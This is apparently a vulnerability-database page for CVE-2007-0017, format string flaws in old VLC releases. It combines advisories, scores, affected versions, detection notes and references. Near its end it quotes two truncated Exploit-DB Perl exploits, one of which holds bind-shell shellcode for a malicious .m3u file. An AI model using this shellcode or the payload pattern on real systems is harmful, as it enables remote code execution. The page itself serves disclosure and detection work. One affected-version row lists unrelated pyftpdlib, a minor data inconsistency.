CVE-2007-0017
published 2007-01-03CVE-2007-0017: Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2)…
PriorityP341medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
11.97%
95.6th percentile
Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 0.8.6-svn20061012.debian-1.2 (bookworm) | vlc 0.8.6-svn20061012.debian-1.2 (bookworm) |
| g.rodola | pyftpdlib | >= 0 < 0.2.0 | 0.2.0 |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | — | — |
| videolan | vlc_media_player | >= 0 < 0.8.6-svn20061012.debian-1.2 | 0.8.6-svn20061012.debian-1.2 |
| videolan | vlc_media_player | >= 0 < 0.8.6-svn20061012.debian-1.2 | 0.8.6-svn20061012.debian-1.2 |
| videolan | vlc_media_player | >= 0 < 0.8.6-svn20061012.debian-1.2 | 0.8.6-svn20061012.debian-1.2 |
| videolan | vlc_media_player | >= 0 < 0.8.6-svn20061012.debian-1.2 | 0.8.6-svn20061012.debian-1.2 |
| xine | xine | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Malicious M3U file contains a long #EXTINF line followed by a udp://-- URI with format string specifiers (e.g., %hn) as the stream URL — detect M3U files where the URI scheme is udp:// and the URI body contains printf-style format specifiers. ↗
- →Exploit payload embeds shellcode in the #EXTINF comment field of an M3U file (NOP sled + shellcode bytes before the newline), followed by the malicious udp:// URI — inspect #EXTINF lines for binary/non-printable content. ↗
- →The format string payload uses %hn write primitives (e.g., %<N>d%<pos>$hn patterns) embedded in the udp:// URI string — detect VLC processing of M3U URIs containing %hn or %<digit>$hn substrings. ↗
- →Vulnerable code paths are in the CDDA plugin (libcdda_plugin) and VCDX plugin (libvcdx_plugin) log handlers — monitor for crashes or unexpected code execution originating from these VLC plugin modules. ↗
- ·CVE-2007-0255 (XINE 0.99.4) is noted as a possible variant of CVE-2007-0017 — the same M3U/udp:// format string attack pattern may apply to XINE but with different affected code paths and addresses. ↗
- ·The x86 exploit uses a placeholder jump address (0x41424344) that must be replaced with a valid target address for a working exploit — the provided exploit is a template requiring adaptation. ↗
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
ghsa7.5HIGH
osv6.8MEDIUM
vendor_debian6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3m83-fp4v-w9rv: XINE 0
ghsa_unreviewed·2022-05-01·CVSS 6.8
CVE-2007-0255 [MEDIUM] GHSA-3m83-fp4v-w9rv: XINE 0
XINE 0.99.4 allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a certain M3U file that contains a long #EXTINF line and contains format string specifiers in an invalid udp:// URI, possibly a variant of CVE-2007-0017.
GHSA
GHSA-xh7p-83h3-2grw: Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access
ghsa_unreviewed·2022-05-01
CVE-2007-0017 [MEDIUM] CWE-134 GHSA-xh7p-83h3-2grw: Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access
Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.
GHSA
Improper privilege management in pyftpdlib
ghsa·2022-05-01·CVSS 7.5
CVE-2007-6741 [HIGH] CWE-269 Improper privilege management in pyftpdlib
Improper privilege management in pyftpdlib
The ftp_PORT function in FTPServer.py in pyftpdlib before 0.2.0 does not prevent TCP connections to privileged ports if the destination IP address matches the source IP address of the connection from the FTP client, which might allow remote authenticated users to conduct FTP bounce attacks via crafted FTP data, as demonstrated by an FTP bounce attack against a NAT server, a related issue to CVE-1999-0017.
OSV
CVE-2007-0255: XINE 0
osv·2007-01-16·CVSS 6.8
CVE-2007-0255 [MEDIUM] CVE-2007-0255: XINE 0
XINE 0.99.4 allows user-assisted remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a certain M3U file that contains a long #EXTINF line and contains format string specifiers in an invalid udp:// URI, possibly a variant of CVE-2007-0017.
OSV
CVE-2007-0017: Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access
osv·2007-01-03·CVSS 6.8
CVE-2007-0017 [MEDIUM] CVE-2007-0017: Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access
Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.
Debian
CVE-2007-0017: vlc - Multiple format string vulnerabilities in (1) the cdio_log_handler function in m...
vendor_debian·2007·CVSS 6.8
CVE-2007-0017 [MEDIUM] CVE-2007-0017: vlc - Multiple format string vulnerabilities in (1) the cdio_log_handler function in m...
Multiple format string vulnerabilities in (1) the cdio_log_handler function in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and the (2) cdio_log_handler and (3) vcd_log_handler functions in modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to execute arbitrary code via format string specifiers in an invalid URI, as demonstrated by a udp://-- URI in an M3U file.
Scope: local
bookworm: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
bullseye: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
forky: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
sid: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
trixie: resolved (fixed in 0.8.6-svn20061012.debian-1.2)
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String
exploitdb·2007-01-02
CVE-2007-0017 VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String
VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String
---
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#
$outfile = "pwnage.m3u";
$bindshell =
"\x6a\x42\x58\xcd\x80\x6a\x61\x58\x99\x52\x68\x10\x02\x11\x5c\x89" .
"\xe1\x52\x42\x52\x42\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a" .
"\x68\x58\xcd\x80\xb0\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97" .
"\x6a\x02\x59\x6a\x5a\x58\x51\x57\x51\xcd\x80\x49\x0f\x89\xf1\xff" .
"\xff\xff\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50" .
"\x54\x54\x53\x53\xb0\x3b\xcd\x80";
# MALLOC 02800000-03008000 [ 8224K] rw-/rwx SM=COW ...e_0x
Exploit-DB
VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)
exploitdb·2007-01-02
CVE-2007-0017 VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)
VideoLAN VLC Media Player 0.8.6 (PPC) - 'udp://' Format String (PoC)
---
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a saved return addy with our shellcode address.
# This code currently overwrites the saved return addy with the stack location of our shellcode.
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#
# 0xf02031d2: "--? 0j? 0h%11$hn.%12$hn", 'X' ...
# 0xf020329a: 'X' ...
# 0xf0203362: 'X' ...
# 0xf020342a: 'X' ...
# 0xf02034f2: 'X' , "ZY"
# 0xf02035b7: ""
# 0xf02035b8: 'X' , "? 5?\005\017G?? 60"
# 0xf02035d5: ""
# 0xf02035d6: ""
# 0xf02035d7: "\00
No writeups or analysis indexed.
http://applefun.blogspot.com/2007/01/moab-02-01-2007-vlc-media-player-udp.htmlhttp://landonf.bikemonkey.org/code/macosx/MOAB_Day_2.20070103045559.6753.timor.htmlhttp://osvdb.org/31163http://projects.info-pull.com/moab/MOAB-02-01-2007.htmlhttp://secunia.com/advisories/23592http://secunia.com/advisories/23829http://secunia.com/advisories/23910http://secunia.com/advisories/23971http://security.gentoo.org/glsa/glsa-200701-24.xmlhttp://securitytracker.com/id?1017464http://trac.videolan.org/vlc/changeset/18481http://www.debian.org/security/2007/dsa-1252http://www.novell.com/linux/security/advisories/2007_13_xine.htmlhttp://www.securityfocus.com/bid/21852http://www.via.ecp.fr/via/ml/vlc-devel/2007-01/msg00005.htmlhttp://www.videolan.org/patches/vlc-0.8.6-MOAB-02-01-2007.patchhttp://www.videolan.org/sa0701.htmlhttp://www.vupen.com/english/advisories/2007/0026https://exchange.xforce.ibmcloud.com/vulnerabilities/31226https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14313http://applefun.blogspot.com/2007/01/moab-02-01-2007-vlc-media-player-udp.htmlhttp://landonf.bikemonkey.org/code/macosx/MOAB_Day_2.20070103045559.6753.timor.htmlhttp://osvdb.org/31163http://projects.info-pull.com/moab/MOAB-02-01-2007.htmlhttp://secunia.com/advisories/23592http://secunia.com/advisories/23829http://secunia.com/advisories/23910http://secunia.com/advisories/23971http://security.gentoo.org/glsa/glsa-200701-24.xmlhttp://securitytracker.com/id?1017464http://trac.videolan.org/vlc/changeset/18481http://www.debian.org/security/2007/dsa-1252http://www.novell.com/linux/security/advisories/2007_13_xine.htmlhttp://www.securityfocus.com/bid/21852http://www.via.ecp.fr/via/ml/vlc-devel/2007-01/msg00005.htmlhttp://www.videolan.org/patches/vlc-0.8.6-MOAB-02-01-2007.patchhttp://www.videolan.org/sa0701.htmlhttp://www.vupen.com/english/advisories/2007/0026https://exchange.xforce.ibmcloud.com/vulnerabilities/31226https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14313
2007-01-03
Published